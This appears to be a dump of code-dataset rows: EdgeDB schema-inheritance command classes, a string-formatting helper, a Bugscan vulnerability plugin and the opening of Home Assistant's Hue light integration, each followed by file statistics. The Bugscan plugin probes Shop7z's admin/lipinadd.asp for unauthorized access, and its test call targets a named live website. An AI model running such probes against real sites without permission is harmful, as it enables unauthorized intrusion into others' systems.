if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| 35.015435
| 79
| 0.588994
| 4,428
| 43,104
| 5.49458
| 0.099142
| 0.038471
| 0.027785
| 0.028894
| 0.430744
| 0.353432
| 0.290629
| 0.263296
| 0.220797
| 0.186848
| 0
| 0.000594
| 0.336094
| 43,104
| 1,230
| 80
| 35.043902
| 0.8496
| 0.04568
| 0
| 0.38976
| 0
| 0
| 0.022016
| 0.005358
| 0
| 0
| 0
| 0
| 0.022989
| 1
| 0.044932
| false
| 0.001045
| 0.012539
| 0.00418
| 0.129572
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a2d4c2633ce0ba08875637d40181583a434b5a
| 1,740
|
py
|
Python
|
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | 1
|
2021-05-31T09:21:19.000Z
|
2021-05-31T09:21:19.000Z
|
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | null | null | null |
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | null | null | null |
from calendar import month_name
class Tools:
def __init__(self):
self.output = ""
def formatDate(self, date):
elements = date.split("-")
return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}"
def shortenText(self, string, n): #return first n sentences from string
first = string.find(".")
for _ in range(n - 1):
if not string.find(".", first + 1) == -1:
first = string.find(".", first + 1)
return f"{string[:first-len(string)]}."
def tupleUnpack(self, tup):
self.output = ""
for item in tup:
self.output += f"{item} "
return self.output[:-1]
def joinList(self, list):
self.output = ""
for item in list:
self.output += f"{item}, "
return self.output[:-2] #remove last ', '
def partialJoin(self, list, n):
self.output = ""
i = 0
for item in list:
self.output += f"{item}, "
i += 1
if i >= n:
break
return self.output[:-2]
def processFilmography(self, list, n):
self.output = ""
i = 0
for item in list:
if 'year' in item:
self.output += f"{item['title']} ({item['year']}), "
else:
self.output += f"{item['title'].replace(' ()', '')}, "
i += 1
if i >= n:
break
return self.output[:-2]
def convertTime(self, runtime):
time = int(runtime)
mins = time % 60
hours = int(time / 60)
if hours >= 1:
return f"{hours} h {mins} min"
else:
return f"{mins} min"
| 29
| 77
| 0.468391
| 201
| 1,740
| 4.019901
| 0.278607
| 0.173267
| 0.068069
| 0.092822
| 0.357673
| 0.272277
| 0.272277
| 0.214109
| 0.160891
| 0.160891
| 0
| 0.018657
| 0.383908
| 1,740
| 60
| 78
| 29
| 0.735075
| 0.029885
| 0
| 0.442308
| 0
| 0
| 0.129816
| 0.0492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.019231
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a338753672931f84d30f4a3787e44f246ba8c1
| 583
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 烽火戏诸侯
#_PlugName_ = Shop7z /admin/lipinadd.asp越权访问
import re
def assign(service, arg):
if service == "shop7z":
return True, arg
def audit(arg):
payload = 'admin/lipinadd.asp'
target = arg + payload
code, head,res, errcode, _ = curl.curl2(target)
if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
security_hole(target)
if __name__ == '__main__':
from dummy import *
audit(assign('shop7z', 'http://www.99ysbjw.com/')[1])
| 27.761905
| 80
| 0.603774
| 73
| 583
| 4.60274
| 0.671233
| 0.077381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025057
| 0.246998
| 583
| 21
| 81
| 27.761905
| 0.740319
| 0.176672
| 0
| 0
| 0
| 0
| 0.201313
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.153846
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a3a70ae5392650e62af677f5914bc6b6d670e2
| 18,444
|
py
|
Python
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 5
|
2017-01-26T16:33:09.000Z
|
2018-07-20T13:50:47.000Z
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 68
|
2018-10-04T16:01:20.000Z
|
2022-03-31T06:21:46.000Z
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 7
|
2018-10-04T10:12:45.000Z
|
2021-12-29T20:55:40.000Z
|
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
